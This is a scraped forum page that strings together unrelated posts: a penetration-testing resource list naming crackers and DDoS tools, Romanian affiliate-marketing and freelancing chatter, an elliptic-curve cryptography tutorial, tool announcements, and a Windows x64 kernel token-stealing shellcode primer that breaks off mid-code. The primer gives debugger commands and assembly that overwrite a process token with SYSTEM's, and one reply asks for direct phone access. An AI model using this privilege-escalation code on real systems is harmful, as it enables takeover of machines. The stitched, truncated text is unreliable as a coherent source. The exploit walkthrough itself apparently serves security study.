Leaderboard

[h=2]Awesome Penetration Testing[/h] A collection of awesome penetration testing resources, tools, books, confs, magazines and other shiny things Online Resources Penetration Testing Resources Shell Scripting Resources Linux Resources Shellcode development Social Engineering Resources Lock Picking Resources [*] Tools Penetration Testing Distributions Basic Penetration Testing Tools Vulnerability Scanners Network Tools Hex Editors Crackers Windows Utils DDoS Tools Social Engineering Tools Anonimity Tools Reverse Engineering Tools [*] Books Penetration Testing Books Hackers Handbook Series Network Analysis Books Reverse Engineering Books Malware Analysis Books Windows Books Social Engineering Books Lock Picking Books [*]Vulnerability Databases [*]Security Courses [*]Information Security Conferences [*]Information Security Magazines [*]Awesome Lists [*]Contribution [*]License [h=3][/h][h=3]Online Resources[/h] [h=4]Penetration Testing Resources[/h] Metasploit Unleashed - Free Offensive Security metasploit course PTES - Penetration Testing Execution Standard OWASP - Open Web Application Security Project OSSTMM - Open Source Security Testing Methodology Manual [h=4]Shell Scripting Resources[/h] LSST - Linux Shell Scripting Tutorial [h=4]Linux resources[/h] Kernelnewbies - A community of aspiring Linux kernel developers who work to improve their Kernels [h=4][/h][h=4]Shellcode development[/h] Shellcode Tutorials - Tutorials on how to write shellcode Shellcode examples - Shellcodes database [h=4][/h][h=4]Social Engineering Resources[/h] Social Engineering Framework - An information resource for social engineers [h=4][/h][h=4]Lock Picking Resources[/h] Schuyler Towne channel - Lockpicking videos and security talks [h=3][/h][h=3]Tools[/h] [h=4][/h][h=4]Penetration Testing Distributions[/h] Kali - A Linux distribution designed for digital forensics and penetration testing NST - Network Security Toolkit distribution Pentoo - security-focused livecd based on Gentoo BackBox - Ubuntu-based distribution for penetration tests and security assessments [h=4]Basic Penetration Testing Tools[/h] Metasploit - World's most used penetration testing software Burp - An integrated platform for performing security testing of web applications [h=4]Vulnerability Scanners[/h] Netsparker - Web Application Security Scanner Nexpose - Vulnerability Management & Risk Management Software Nessus - Vulnerability, configuration, and compliance assessment Nikto - Web application vulnerability scanner OpenVAS - Open Source vulnerability scanner and manager OWASP Zed Attack Proxy - Penetration testing tool for web applications w3af - Web application attack and audit framework Wapiti - Web application vulnerability scanner [h=4][/h][h=4]Networks Tools[/h] nmap - Free Security Scanner For Network Exploration & Security Audits tcpdump/libpcap - A common packet analyzer that runs under the command line Wireshark - A network protocol analyzer for Unix and Windows Network Tools - Different network tools: ping, lookup, whois, etc netsniff-ng - A Swiss army knife for for network sniffing Intercepter-NG - a multifunctional network toolkit [h=4]SSL Analysis Tools[/h] SSLyze - SSL configuration scanner [h=4]Hex Editors[/h] HexEdit.js - Browser-based hex editing [h=4]Crackers[/h] John the Ripper - Fast password cracker Online MD5 cracker - Online MD5 hash Cracker [h=4]Windows Utils[/h] Sysinternals Suite - The Sysinternals Troubleshooting Utilities Windows Credentials Editor - security tool to list logon sessions and add, change, list and delete associated credentials [h=4]DDoS Tools[/h] LOIC - An open source network stress tool for Windows JS LOIC - JavaScript in-browser version of LOIC [h=4]Social Engineering Tools[/h] SET - The Social-Engineer Toolkit from TrustedSec [h=4]Anonimity Tools[/h] Tor - The free software for enabling onion routing online anonymity I2P - The Invisible Internet Project [h=4]Reverse Engineering Tools[/h] IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger WDK/WinDbg - Windows Driver Kit and WinDbg OllyDbg - An x86 debugger that emphasizes binary code analysis [h=3]Books[/h] [h=4]Penetration Testing Books[/h] The Art of Exploitation by Jon Erickson, 2008 Metasploit: The Penetration Tester's Guide by David Kennedy and others, 2011 Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014 Rtfm: Red Team Field Manual by Ben Clark, 2014 The Hacker Playbook by Peter Kim, 2014 The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013 Professional Penetration Testing by Thomas Wilhelm, 2013 Advanced Penetration Testing for Highly-Secured Environments by Lee Allen,2012 Violent Python by TJ O'Connor, 2012 Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini, 2007 [h=4]Hackers Handbook Series[/h] The Shellcoders Handbook by Chris Anley and others, 2007 The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011 iOS Hackers Handbook by Charlie Miller and others, 2012 Android Hackers Handbook by Joshua J. Drake and others, 2014 The Browser Hackers Handbook by Wade Alcorn and others, 2014 [h=4]Network Analysis Books[/h] Nmap Network Scanning by Gordon Fyodor Lyon, 2009 Practical Packet Analysis by Chris Sanders, 2011 Wireshark Network Analysis by by Laura Chappell, Gerald Combs, 2012 [h=4]Reverse Engineering Books[/h] Reverse Engineering for Beginners by Dennis Yurichev (free!) The IDA Pro Book by Chris Eagle, 2011 Practical Reverse Engineering by Bruce Dang and others, 2014 Reverse Engineering for Beginners [h=4]Malware Analysis Books[/h] Practical Malware Analysis by Michael Sikorski, Andrew Honig, 2012 The Art of Memory Forensics by Michael Hale Ligh and others, 2014 [h=4]Windows Books[/h] Windows Internals by Mark Russinovich, David Solomon, Alex Ionescu [h=4]Social Engineering Books[/h] The Art of Deception by Kevin D. Mitnick, William L. Simon, 2002 The Art of Intrusion by Kevin D. Mitnick, William L. Simon, 2005 Ghost in the Wires by Kevin D. Mitnick, William L. Simon, 2011 No Tech Hacking by Johnny Long, Jack Wiles, 2008 Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010 Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014 [h=4][/h][h=4]Lock Picking Books[/h] Practical Lock Picking by Deviant Ollam, 2012 Keys to the Kingdom by Deviant Ollam, 2012 [h=3]Vulnerability Databases[/h] NVD - US National Vulnerability Database CERT - US Computer Emergency Readiness Team OSVDB - Open Sourced Vulnerability Database Bugtraq - Symantec SecurityFocus Exploit-DB - Offensive Security Exploit Database Fulldisclosure - Full Disclosure Mailing List MS Bulletin - Microsoft Security Bulletin MS Advisory - Microsoft Security Advisories Inj3ct0r - Inj3ct0r Exploit Database Packet Storm - Packet Storm Global Security Resource SecuriTeam - Securiteam Vulnerability Information CXSecurity - CSSecurity Bugtraq List Vulnerability Laboratory - Vulnerability Research Laboratory ZDI - Zero Day Initiative [h=3][/h][h=3]Security Courses[/h] Offensive Security Training - Training from BackTrack/Kali developers SANS Security Training - Computer Security Training & Certification Open Security Training - Training material for computer security classes CTF Field Guide - everything you need to win your next CTF competition [h=3]Information Security Conferences[/h] DEF CON - An annual hacker convention in Las Vegas Black Hat - An annual security conference in Las Vegas BSides - A framework for organising and holding security conferences CCC - An annual meeting of the international hacker scene in Germany DerbyCon - An annual hacker conference based in Louisville PhreakNIC - A technology conference held annually in middle Tennessee ShmooCon - An annual US east coast hacker convention CarolinaCon - An infosec conference, held annually in North Carolina HOPE - A conference series sponsored by the hacker magazine 2600 SummerCon - One of the oldest hacker conventions, held during Summer Hack.lu - An annual conference held in Luxembourg HITB - Deep-knowledge security conference held in Malaysia and The Netherlands Troopers - Annual international IT Security event with workshops held in Heidelberg, Germany Hack3rCon - An annual US hacker conference ThotCon - An annual US hacker conference held in Chicago LayerOne - An annual US security conerence held every spring in Los Angeles DeepSec - Security Conference in Vienna, Austria SkyDogCon - A technology conference in Nashville [h=3][/h][h=3]Information Security Magazines[/h] 2600: The Hacker Quarterly - An American publication about technology and computer "underground" Hakin9 - A Polish online, weekly publication on IT Security [h=3]Awesome Lists[/h] SecTools - Top 125 Network Security Tools C/C++ Programming - One of the main language for open source security tools .NET Programming - A software framework for Microsoft Windows platform development Shell Scripting - Command-line frameworks, toolkits, guides and gizmos Ruby Programming by @SiNdresorhus - JavaScript in command-line Node.js Programming by @vndmtrx - JavaScript in command-line Python tools for penetration testers - Lots of pentesting tools are written in Python Python Programming by @svaksha - General Python programming Python Programming by @vinta - General Python programming Andorid Security - A collection of android security related resources Awesome Awesomness - The List of the Lists [h=3][/h][h=3]Contribution[/h] Your contributions and suggestions are heartily? welcome. (????) [h=3][/h][h=3]License[/h] This work is licensed under a Creative Commons Attribution 4.0 International License Sursa: https://github.com/enaqx/awesome-pentest

Unul dintre putinii oameni ok de pe forum, respectul meu! Pacat ca nu ai tangenta cu pasiunea noastra si cu forumul. Sunt dispus sa te ajut, dar iti trebuie acces direct la telefon pentru cel putin jumatate de ora sa putem instala ce trebuie si sa facem un test, doua. N-am nevoie de bani sau alte foloase materiale. Te salut!

Salut, Nu mai sunt atat de activ ca inainte pe forum dar incerc sa intru la 2-3 zile - insa primesc in continuare mesaje pe tema dropshippingului - ce tin sa va zic ca ca aceast domeniu nu este pentru oricine - ai nevoie de ceva capital ca sa mearga treburile rapid, de o platforma, plugins etc - depinde ce folosesti - dar mai ales de cadru legal. Odata ce faci mai multi banuti incep sa apara probleme, paypal iti limiteaza contul, stripe cere dovezi si tot asa, plus taxe de platit etc. Observ ca multi nu se descurca, altii renunta cand aud de cadru legal si asa mai departe insa toata lumea vrea sa faca bani si nu inteleg de ce lumea nu merge pe "old fashion way" blog sau aflieri cu amazon sau ceva de genu pentru ca merge, eu vad asta in fiecare zi, mai exact, o simt la buzunar.. La un moment dat am renuntat la aflieri si adsense si amazon si media.net dar am reluat de cateva luni si merge chiar foarte bine a-si putea spune. Nustiu daca frecventati Flippa insa eu o fac zilnic si gasesc acolo diferite chilipiruri in materie de NISE, am si vandut cateva site-uri, am mai cumparat unele insa pentru mine acest website e ca un fel de cutia pandorei. Acum ceva timp s-a vandut un site cu 4000 de dolari daca nu ma insel, era o pagina statica, alba complet cu un articol de 700 de cuvinte... a fost mind fuck, am verificat site-ul, avea 26 de backlinkuri, pareau naturale...cele mai multe de la directoare web. Competitie 4-5 siteuri...poate.. Next Step pentru mine, am cumparat un domeniu si hosting (19$ pe an pentru amundoua de la NameCheap) am incarcat o tema, am contactat o firma care imi scrie articole (7.50$ / 500 cuvinte) si am comandat 5 articole, unul de 2000, si restul de 500. Am luat un pachet seo de pe BHW unde am platit 130$. Investitia finala a fost undeva la 200 de dolari, plus minus. Asta am facut in prima saptamana, apoi NIMIC, l-am lasat sa doarma acolo. Cati bani face? Nu mult, in a 3-a luna e ok. Si asta e doar amazon, cu ce am mai facut din media.net ajung la 200 si asta e doar un site. Trafic doar din google - organic, fara social media fara nimic, nisa e cam "strange" si nustiu ce accounturi a-si putea face. Acum inmultiti cu 4 site-ui ca atatea am pe partea asta deocamdata... ------------------------------------------------- Short Story - Cu ce ajuta 1000223 topicuri cu 12232 de intrebari daca x lucru e mort, daca se mai poate daca etc.. totul merge, doar sa te tii. Mergi pe kwfinder cautati un cuvant / nisa usor de rankat si da drumu la treaba. Un prieten ma facea idiot aseara cand eu ii spuneam ca a face bani pe net e joaca de copii - poate e doar parerea mea - aici nu vorbesc de sute mii de doalri...ci de bani in general...e simplu, doar apuca-te de treaba si tine-te de ea. Daca renunti si la fumat 1 saptamana sau la scuipat seminte s-ar putea sa ai bani de domeniu si hosting sau orice altceva. Numai Bine.

Blockchain 101 - Elliptic Curve Cryptography Aug 15, 2017 | By Jimmy Song, Principal Blockchain Architect In this series of articles, I’m aiming to give you a solid foundation for blockchain development. In the last article, we gave an overview of the foundational math, specifically, finite fields and elliptic curves. In this article, my aim is to get you comfortable with elliptic curve cryptography (ECC, for short). This lesson builds upon the last one, so be sure to read that one first before continuing. The Magic of Elliptic Curve Cryptography Finite fields are one thing and elliptic curves another. We can combine them by defining an elliptic curve over a finite field. All the equations for an elliptic curve work over a finite field. By “work”, we mean that we can do the same addition, subtraction, multiplication and division as defined in a particular finite field and all the equations stay true. If this sounds confusing, it is. Abstract algebra is abstract! Of course, the elliptic curve graphed over a finite field looks very different than an actual elliptic curve graphed over the Reals. An elliptic curve over real numbers looks like this: An elliptic curve over a finite field looks scattershot like this: How to calculate Elliptic Curves over Finite Fields Let’s look at how this works. We can confirm that (73, 128) is on the curve y2=x3+7 over the finite field F137. $ python2 >>> 128**2 % 137 81 >>> (73**3 + 7) % 137 81 The left side of the equation (y2) is handled exactly the same as in a finite field. That is, we do field multiplication of y * y. The right side is done the same way and we get the same value. Exercise True or False: Point is on the y2=x3+7 curve over F223 1. (192, 105) 2. (17, 56) 3. (200, 119) 4. (1, 193) 5. (42, 99) Highlight to reveal answers: 1. True, 2. True, 3. False, 4. True, 5. False Group Law The group law for an elliptic curve also works over a finite field: Curve:y2=x3+ax+b P1=(x1,y1) P2=(x2,y2) P1+P2=(x3,y3) When x1≠x2: s=(y2-y1)/(x2-x1) x3=s2-x1-x2 y3=s(x1-x3)-y1 As discussed in the previous article, the above equation is used to find the third point that intersects the curve given two other points on the curve. In a finite field, this still holds true, though not as intuitively since the graph is a large scattershot. Essentially, all of these equations work in a finite field. Let’s see in an example: Curve: y2=x3+7 Field: F137 P1 = (73, 128) P2 = (46, 22) Find P1+P2 First, we can confirm both points are on the curve: 1282% 137 = 81 = (733+7) % 137 222% 137 = 73 = (463+7) % 137 Now we apply the formula above: s = (y2-y1)/(x2-x1) = (22-128)/(46-73) = 106/27 To get 1/27, we have to use field division as we learned last time. Python: >>> pow(27, 135, 137) 66 >>> (106*66) % 137 9 We get s=106/27=106*66 % 137=9. Now we can calculate the rest: x3 = s2-x1-x2 = 92-46-73 = 99 y3 = s(x1-x3)-y1 = 9(73-99)-128 = 49 We can confirm that this is on the curve: 492% 137 = 72 = (993+7) % 137 P1+P2 = (99, 49) Exercise Calculate the following on the curve: y2=x3+7 over F223 1. (192, 105) + (17, 56) 2. (47, 71) + (117, 141) 3. (143, 98) + (76, 66) Highlight to reveal answers: 1. (170, 142), 2. (60, 139), 3. (47, 71) Using the Group Law Given a point on the curve, G, we can create a nice finite group. A group, remember, is a set of numbers closed under a single operation that’s associative, commutative, invertible and has an identity. We produce this group, by adding the point to itself. We can call that point 2G. We can add G again to get 3G, 4G and so on. We do this until we get to some nG where nG=0. This set of points {0, G, 2G, 3G, 4G, … (n-1)G} is a mathematical group. 0, by the way, is the “point at infinity”. You get this point by adding (x,y) + (x,-y). Given that (x,y) is on the curve (x,-y) is on the curve since the left side of the elliptic curve equation has a y2. Adding these produces a point that’s got infinity for both x and y. This is what we call the identity. It turns out that calculating sG = P is pretty easy, but given G and P, it’s difficult to calculate s without checking every possible number from 1 to n-1. This is called the Discrete Log problem and it’s very hard to go backwards if n is really large. This s is what we call the secret key. Because the field is finite, the group is also finite. What’s more, if we choose the elliptic curve and the prime number of the field carefully, we can also make the group have a large prime number of elements. Indeed, that’s what defines an elliptic curve for the purposes of elliptic curve cryptography. Defining a Curve Specifically, each ECC curve defines: elliptic curve equation (usually defined as a and b in the equation y2 = x3 + ax + p = Finite Field Prime Number G = Generator point n = prime number of points in the group The curve used in Bitcoin is called secp256k1 and it has these parameters: Equation y2 = x3 + 7 (a = 0, b = 7) Prime Field (p) = 2256 - 232 - 977 Base point (G) = (79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798, 483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8) Order (n) = FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 The curve’s name is secp256k1, where SEC stands for Standards for Efficient Cryptography and 256 is the number of bits in the prime field. The big thing to note about this curve is that n is fairly close to p. That is, most points on the curve are in the group. This is not necessarily a property shared in other curves. As a result, we have something pretty close to 2256 possible secret keys. How Big Is 2256? Note that 2256 is a really large number. It’s around 1077, which is way more than the number of atoms in our galaxy (1057). It’s basically inconceivable to calculate all possible secret keys as there are simply too many of them. A trillion computers doing a trillion operations every picosecond (10-12 seconds) for a trillion years is still less than 1056 operations. Human intuition breaks down when it comes to numbers this big, perhaps because until recently we’ve never had a reason to think like this; if you’re thinking that all you need is more/faster computers, the numbers above haven’t sunk in. Working With Elliptic Curves To begin working with elliptic curves, let’s confirm that the generator point (G) is on the curve (y2 = x3 + 7) G = (79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798, 483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8) p = 2256 - 232 - 977 y2 = x3 + 7 $ python2 >>> x = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798 >>> y = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8 >>> p = 2**256 - 2**32 - 977 >>> y**2 % p == (x**3 + 7) % p True Remember, we’re always working in the Prime Field of p. This means that we always mod p for these operations. Next, let’s confirm that G has order n. That is, nG = 1. This is going to require the use of a python library called pycoin. It has all of the secp256k1 curve parameters that we can check. Similar libraries exist for other languages. Note that the actual process is a bit more complicated and the reader is encouraged to explore the implementation for more details. G = (79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798, 483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8) n = FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 $ python2: >>> n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 >>> from pycoin.ecdsa import generator_secp256k1 as g >>> (n*g).pair() (None, None) (None, None) is actually the point at infinity, or the identity for point-addition. Utilizing ECC for Public Key Cryptography Private keys are the scalars, usually donated with “s” or some other lower case letter. The public key is the resulting point of the scalar multiplication or sG, which is usually denoted with “P”. P is actually a point on the curve and is thus two numbers, the x and y coordinate or (x,y). Here’s how you can derive the public key from the private key: Python: >>> from pycoin.ecdsa import generator_secp256k1 as g >>> secret = 999 >>> x, y = (secret*g).pair() >>> print(hex(x), hex(y)) ('0x9680241112d370b56da22eb535745d9e314380e568229e09f7241066003bc471L', '0xddac2d377f03c201ffa0419d6596d10327d6c70313bb492ff495f946285d8f38L') Exercise 1. Get the public points for s in (7, 1485, 2128, 2240+231) in the secp256k1 curve. 2. Confirm the resulting points lie on the secp256k1 curve. Highlight to reveal answers: (5CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC, 6AEBCA40BA255960A3178D6D861A54DBA813D0B813FDE7B5A5082628087264DA), (C982196A7466FBBBB0E27A940B6AF926C1A74D5AD07128C82824A11B5398AFDA, 7A91F9EAE64438AFB9CE6448A1C133DB2D8FB9254E4546B6F001637D50901F55), (8F68B9D2F63B5F339239C1AD981F162EE88C5678723EA3351B7B444C9EC4C0DA, 662A9F2DBA063986DE1D90C2B6BE215DBBEA2CFE95510BFDF23CBF79501FFF82), (9577FF57C8234558F293DF502CA4F09CBC65A6572C842B39B366F21717945116, 10B49C67FA9365AD7B90DAB070BE339A1DAF9052373EC30FFAE4F72D5E66D053) SEC Format The private keys are just 256 bit numbers, but the public keys are actually 2 different 256-bit numbers. This means that we need to serialize them. The same organization (Standards for Efficient Cryptography) created a format for this very purpose. There are two versions, compressed and uncompressed. Let’s start with the uncompressed version: The first point from exercise 1 above is: (x, y) = (5CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC, 6AEBCA40BA255960A3178D6D861A54DBA813D0B813FDE7B5A5082628087264DA) In uncompressed SEC, we concatenate the byte “04”, then the X-coordinate and then the Y-coordinate. It looks something like this in hex: 045CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC6AEBCA40BA255960A3178D6D861A54DBA813D0B813FDE7B5A5082628087264DA Because the x and y coordinates are 32-bytes (256 bits) each, the length of an uncompressed SEC format public key is 65 bytes. It turns out this is a little bit inefficient. If we know the x coordinate, there are only two possible y-coordinates, the positive and negative (odd and even in a finite field). Thus, they came up with a compressed SEC format. The first byte is “02” if y is even, “03” if y is odd. Then we concatenate the x-coordinate. The above point in Compressed SEC format is this: 025CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC This is because the y-coordinate ends in A, which is even in hex. Note that compressed keys are always 33 bytes (1 byte + 32 byte x-coordinate) Exercise Find the compressed and uncompressed SEC format for the public keys where the secret key is: 1. 9993 2. 123 3. 42424242 Highlight to reveal answers: 049D5CA49670CBE4C3BFA84C96A8C87DF086C6EA6A24BA6B809C9DE234496808D56FA15CC7F3D38CDA98DEE2419F415B7513DDE1301F8643CD9245AEA7F3F911F9, 039D5CA49670CBE4C3BFA84C96A8C87DF086C6EA6A24BA6B809C9DE234496808D5 04A598A8030DA6D86C6BC7F2F5144EA549D28211EA58FAA70EBF4C1E665C1FE9B5204B5D6F84822C307E4B4A7140737AEC23FC63B65B35F86A10026DBD2D864E6B, 03A598A8030DA6D86C6BC7F2F5144EA549D28211EA58FAA70EBF4C1E665C1FE9B5 04AEE2E7D843F7430097859E2BC603ABCC3274FF8169C1A469FEE0F20614066F8E21EC53F40EFAC47AC1C5211B2123527E0E9B57EDE790C4DA1E72C91FB7DA54A3, 03AEE2E7D843F7430097859E2BC603ABCC3274FF8169C1A469FEE0F20614066F8E Conclusion In this lesson, we learned how to combine finite fields and elliptic curves to create a finite group for use in public key cryptography. Next time, we’ll show how to convert SEC format public keys to Bitcoin Addresses and how we can sign and verify messages using the math learned here. Sursa: https://eng.paxos.com/blockchain-101-elliptic-curve-cryptography

Am încercat să închei o înțelegere în urma acestui anunț, dar n-am avut cu cine. Pe lângă faptul că m-a întrebat „de ce contează bugetul de care dispun?”, avea impresia că un programator lucrează pe câțiva cenți sau ceva de genul ăsta. Nu recomand.

isi au rostul asemenea cuvinte Un cuvant, doua, adica mai multe, plural, subiect-predicat, acord, alea, alea, limba materna ca suntem content writer-i. I'm out. Voi cautati sa faceti business pe un forum de securitate online, mai da-va-n kkt cu pseudo firma voastra. Ca tu ai venit la noi, nu noi la tine.

http://www.roforum.net/search/2316136/ Attention whore, bad for business Nu este nimic discutabil in privat, cand cauti ceva si postezi un anunt, scrii si bugetul de care dispui, pentru a evita pierderea de timp inutila a ambelor parti. Si eu vand rosii, dar pretul nu-l expun la taraba, il fac asa dupa om. Astea se intampla in targuri pe unde misuna ciuganii. Esti ciugan? Spune ca vrei cu 50 de centi/1 dolar per articol, sunt flamanzi o gramada aici pe forum (fara suparare baieti). Numai oameni de afaceri! @Thira Dc nu ti le scrii singur. Vad ca asa ai postat acolo Ma ofer eu , 40 lei zi , 10-20 articole , ma bag !

Se ofera: ? ? ?

PyStat - Advanced Netstat For Windows Features: Know remote address of process Know remote ports of process Know which user using process along with title & PID Changelogs: Auto Install python modules support added in install.py Installation Guide Download the .zip file Extract the pystat folder from .zip file to some drive i.e C:\tools\pystat Goto C:\tools\pystat Press SHIFT KEY + RIGHT CLICK and select open Command Window here Enter this command python install.py, Enjoy Warning! Don't move pystat folder after installation, will stop working Download PyStat-master.zip Source: https://github.com/roothaxor/PyStat

Hey, I am a newbie in here.And want to learn from here. Thank you for your post.

AUTHENTICATION SERVER The idea behind Isolate is that we should somehow manage how do people get access to our servers. How can we make this process more secure? How could we prevent a system from being compromised when someone lost the laptop with ssh key. What would we do in case someone quits the company - is there an alternative to just changing all passwords, keys, etc? Isolate adds OTP 2FA to SSH login. It could be hardware YubiKey or Google Authenticator app. If someone lost the password - OTP key is here and the intruder can't get access to the bastion host. Users don't get direct access to endpoint servers - they go there through Isolate server, the system tracks their actions. You can easily manage access to the bastion server - add/remove users, etc. Technically you should generate and place the bastion host key on endpoint servers, and users will get regular access to Isolate server with the sudoer access to ssh command. Once they want to connect to the endpoint server, the system executes ssh command and ssh client running with privileged user permissions gets server key and using it the system gets access to the server we need to get access to. Supports OTP (counter and time based) 2FA algorithms SSH sessions logging Requirements Fresh CentOS 7 / Ubuntu 16.04 / Debian 9 setup Ansible 2.3+ for install or update Installation https://github.com/itsumma/isolate#install Download isolate-master.zip Source: https://github.com/itsumma/isolate

A Primer to Windows x64 shellcoding • Posted by hugsy on August 14, 2017 • windows • kernel • debugging • exploit • token • shellcode Continuing on the path to Windows kernel exploitation… Thanks to the previous post, we now have a working lab for easily (and in a reasonably fast manner) debug Windows kernel. Let’s skip ahead for a minute and assume we control PC using some vulnerability in kernel land (next post), then we may want to jump back into a user allocated buffer to execute a control shellcode. So where do we go from now? How to transform this controlled PC in the kernel-land into a privileged process in user-land? The classic technique is to steal the System process token and copy it into the structure of our targeted arbitrary (but unprivileged) process (say cmd.exe). Note: our target here will the Modern.IE Windows 8.1 x64 we created in the previous post, that we’ll interact with using kd via Network debugging. Refer to previous post if you need to set it up. Stealing SYSTEM token using kd The !process extension of WinDBG provides a structured display of one or all the processes. kd> !process 0 0 System PROCESS ffffe000baa6c040 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 001a7000 ObjectTable: ffffc0002f403000 HandleCount: <Data Not Accessible> Image: System This leaks the address of the _EPROCESS structure in the kernel, of the proces named System. Using dt will provide a lot more info (here, massively truncated to what interests us): kd> dt _EPROCESS ffffe000baa6c040 ntdll!_EPROCESS +0x000 Pcb : _KPROCESS [...] +0x2e0 UniqueProcessId : 0x00000000`00000004 Void +0x2e8 ActiveProcessLinks : _LIST_ENTRY [ 0xffffe000`bbc54be8 - 0xfffff801`fed220a0 ] [...] +0x348 Token : _EX_FAST_REF [...] +0x430 PageDirectoryPte : 0 +0x438 ImageFileName : [15] "System" At nt!_EPROCESS.Token (+0x348) we get the process token, which holds a pointer to an “Executive Fast Reference” structure. kd> dt nt!_EX_FAST_REF ffffe000baa6c040+348 +0x000 Object : 0xffffc000`2f405598 Void +0x000 RefCnt : 0y1000 +0x000 Value : 0xffffc000`2f405598 If we nullify the last nibble of the address (i.e. AND with -0xf on x64, -7 on x86), we end up having the System token’s address: kd> ? 0xffffc000`2f405598 & -f Evaluate expression: -70367951432304 = ffffc000`2f405590 kd> dt nt!_TOKEN ffffc000`2f405590 +0x000 TokenSource : _TOKEN_SOURCE +0x010 TokenId : _LUID +0x018 AuthenticationId : _LUID +0x020 ParentTokenId : _LUID +0x028 ExpirationTime : _LARGE_INTEGER 0x06207526`b64ceb90 +0x030 TokenLock : 0xffffe000`baa4ef90 _ERESOURCE +0x038 ModifiedId : _LUID +0x040 Privileges : _SEP_TOKEN_PRIVILEGES +0x058 AuditPolicy : _SEP_AUDIT_POLICY [...] Note: the WinDBG extension !token provides a more detailed (and parsed) output. You might to refer to it instead whenever you are analyzing tokens. So basically, if we create a process (say cmd.exe), and overwrite its token with the System token value we found (0xffffc0002f405590), our process will be running as System. Let’s try! We search our process using kd: kd> !process 0 0 cmd.exe PROCESS ffffe000babfd900 SessionId: 1 Cid: 09fc Peb: 7ff6fa81c000 ParentCid: 0714 DirBase: 45c4c000 ObjectTable: ffffc00036d03940 HandleCount: <Data Not Accessible> Image: cmd.exe Overwrite the offset 0x348 with the SYSTEM token pointer (0xffffc0002f405590). kd> dq ffffe000bc043900+348 l1 ffffe000`bc043c48 ffffc000`30723426 kd> eq 0xffffe000babfd900+0x348 0xffffc0002f405590 And tada … Now we know how to transform any unprivileged process into a privileged one using kd. Shellcoding our way to SYSTEM So the basic idea now, to reproduce the same steps that we did in the last part, but from our shellcode. So we need: A pointer to System EPROCESS structure, and save the token (located at offset +0x348) Look up for the current process EPROCESS structure Overwrite its token with System’s Profit! Getting the current process structure address Pointers to process structures on Windows are stored in a doubly linked list (see the member ActiveProcessLinks of nt!_EPROCESS in kd). If we have the address to one process, we can “scroll” back and forward to discover the others. But first, we need to get the address of at the least one process in the kernel. This is exactly the purpose of the routine nt!PsGetCurrentProcess, but since we can’t call it directly (thank you ASLR), we can still check what is it doing under the hood: kd> uf nt!PsGetCurrentProcess nt!PsGetCurrentProcess: fffff801`feb06e84 65488b042588010000 mov rax,qword ptr gs:[188h] fffff801`feb06e8d 488b80b8000000 mov rax,qword ptr [rax+0B8h] fffff801`feb06e94 c3 ret kd> dps gs:188 l1 002b:00000000`00000188 fffff801`fedbfa00 nt!KiInitialThread mov rax, qword ptr gs:[188h] returns a pointer to an _ETHREAD structure (more specifically the kernel thread (KTHREAD) nt!KiInitialThread). If we check the content of this structure at the offset 0xb8, we find the structure to the current process: kd> dt nt!_EPROCESS poi(nt!KiInitialThread+b8) +0x000 Pcb : _KPROCESS [...] +0x2e0 UniqueProcessId : 0x00000000`00000004 Void +0x2e8 ActiveProcessLinks : _LIST_ENTRY [ 0xffffe000`bbc54be8 - 0xfffff801`fed220a0 ] [...] +0x348 Token : _EX_FAST_REF So now we know where our current process resides in the kernel (just like kd gave us using !process 0 0 cmd.exe earlier), and therefore the first of our shellcode: mov rax, gs:0x188 mov rax, [rax + 0xb8] Browsing through the process list to reach System The processes are stored in the ActiveProcessLinks (offset 0x2e8) of the nt!_EPROCESS structure, via a _LIST_ENTRY, which is a doubly linked list in its simplest form: kd> dt _LIST_ENTRY ntdll!_LIST_ENTRY +0x000 Flink : Ptr64 _LIST_ENTRY +0x008 Blink : Ptr64 _LIST_ENTRY Since we know that System process ID is 4, we can write a very small loop in assembly, whose pseudo-C code would be: ptrProcess = curProcess while ptrProcess->UniqueProcessId != SystemProcess->UniqueProcessId (4) { ptrProcess = ptrProcess->Flink } Which builds the second part of our shellcode: ;; rax has the pointer to the current KPROCESS mov rbx, rax __loop: mov rbx, [rbx + 0x2e8] ;; +0x2e8 ActiveProcessLinks[0].Flink sub rbx, 0x2e8 ;; nextProcess mov rcx, [rbx + 0x2e0] ;; +0x2e0 UniqueProcessId cmp rcx, 4 ;; compare to target PID jnz __loop ;; here rbx hold a pointer to System structure Overwrite the current process token field with System’s This is the third and final part of our shellcode, and the easiest since everything was done in the steps above: ;; rax has the pointer to the current KPROCESS ;; rbx has the pointer to System KPROCESS mov rcx, [rbx + 0x348] ;; +0x348 Token and cl, 0xf0 ;; we must clear the lowest nibble mov [rax + 0x348], rcx The final shellcode We add a few extra instructions to correctly save and restore the context, and make sure we exit cleanly: ;; ;; Token stealing shellcode for Windows 8.1 x64 ;; ;; Save the current context on the stack push 